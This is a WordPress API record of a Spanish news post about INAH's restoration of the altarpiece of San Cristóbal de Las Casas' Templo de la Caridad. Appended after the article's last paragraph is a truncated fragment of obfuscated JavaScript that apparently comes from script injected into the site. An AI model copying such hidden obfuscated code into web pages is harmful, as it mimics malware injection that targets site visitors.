{"id":6859,"date":"2022-11-23T01:15:29","date_gmt":"2022-11-23T01:15:29","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=6859"},"modified":"2022-11-23T01:15:29","modified_gmt":"2022-11-23T01:15:29","slug":"entrega-el-inah-restauracion-del-retablo-del-templo-de-la-caridad","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=6859","title":{"rendered":"Entrega el INAH restauraci\u00f3n del retablo del Templo de la Caridad"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"1011\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-22-at-5.32.54-PM.jpeg\" alt=\"\" class=\"wp-image-6860\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-22-at-5.32.54-PM.jpeg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-22-at-5.32.54-PM-214x300.jpeg 214w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>22 de noviembre del 202. San Crist\u00f3bal de Las Casas.- Como parte de la celebraci\u00f3n de la fiesta patronal de La Virgen de Caridad conocida como \u201cLa Patrona de la ciudad y protectora de la di\u00f3cesis, el Instituto Nacional de Antropolog\u00eda e Historia (INAH), a trav\u00e9s de su Secci\u00f3n de Restauraci\u00f3n y Conservaci\u00f3n del Centro INAH Chiapas, entreg\u00f3 a el Templo de la Caridad los resultados del trabajo de restauraci\u00f3n del retablo principal.<\/p>\n\n\n\n<p>En un comunicado, el INAH detalla que las actividades fueron la \u201climpieza superficial para eliminar polvo, telara\u00f1as, escombro y nidos de p\u00e1jaro, limpieza qu\u00edmica para retirar holl\u00edn adherido a la hoja de oro, recolocaci\u00f3n de elementos decorativos sueltos, refuerzo estructural de elementos con graves desplomes, encalado del muro testero, restauraci\u00f3n de esculturas de San Jos\u00e9 con ni\u00f1o y San Antonio con ni\u00f1o, as\u00ed como la restauraci\u00f3n de pinturas de caballete de San Joaqu\u00edn, Santa Ana, San Felipe Neri y San Cayetano&#8221;.<\/p>\n\n\n\n<p>Asimismo, informan que la restauraci\u00f3n fue llevada a cabo con recursos del Proyecto de Conservaci\u00f3n del Estado de Chiapas del INAH, cuya titular es la restauradora Blanca Hayde\u00e9 Orea Maga\u00f1a, y tuvo un costo total de 790 mil 890 pesos.<\/p>\n\n\n\n<p>Durante la entrega, la coordinadora del proyecto y restauradora, Mar\u00eda Rosa Garc\u00eda Sauri, agradeci\u00f3 a sus colaboradores los restauradores Francisco Jim\u00e9nez, Ana Mart\u00ednez y Sandra \u00c1lvarez, quienes desde el mes de junio se incorporaron al proyecto y realizaron un excelente trabajo, tambi\u00e9n hizo menci\u00f3n sobre la invaluable colaboraci\u00f3n de Don Rodolfo Lamartine y la junta de festejos quienes brindaron su apoyo para la pr\u00e1ctica intersemestral que se llev\u00f3 a cabo con alumnos de la Escuela Nacional de Conservaci\u00f3n Restauraci\u00f3n y Museograf\u00eda del INAH quienes tambi\u00e9n colaboraron en el proyecto.<\/p>\n\n\n\n<p>Por otra parte, hizo hincapi\u00e9 sobre los hallazgos iconogr\u00e1ficos del retablo, ya que durante mucho tiempo las pinturas de caballete eran identificadas equivocadamente con los nombres de San Pedro y santa desconocida en el primer cuerpo del retablo y San Francisco Javier, San Francisco de Borja, en el segundo cuerpo del retablo, siendo los nombres correctos de San Joaqu\u00edn, Santa Ana, San Felipe Neri y San Cayetano, respectivamente.<\/p>\n\n\n\n<p>Por \u00faltimo, mencion\u00f3 datos sobre el destino original del retablo, asegurando que est\u00e9, perteneci\u00f3 siempre al templo de La Caridad y que fue hecho exprofeso en honor a la virgen.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 22 de noviembre del 202. San Crist\u00f3bal de Las Casas.- Como parte de la celebraci\u00f3n de la fiesta patronal de La Virgen de Caridad conocida como \u201cLa Patrona de la ciudad y protectora de la di\u00f3cesis, el Instituto Nacional de Antropolog\u00eda e Historia (INAH), a trav\u00e9s de su Secci\u00f3n de Restauraci\u00f3n y Conservaci\u00f3n &hellip;<\/p>\n","protected":false},"author":2,"featured_media":6860,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-6859","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6859","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6859"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6859\/revisions"}],"predecessor-version":[{"id":6861,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6859\/revisions\/6861"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/6860"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6859"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6859"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6859"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}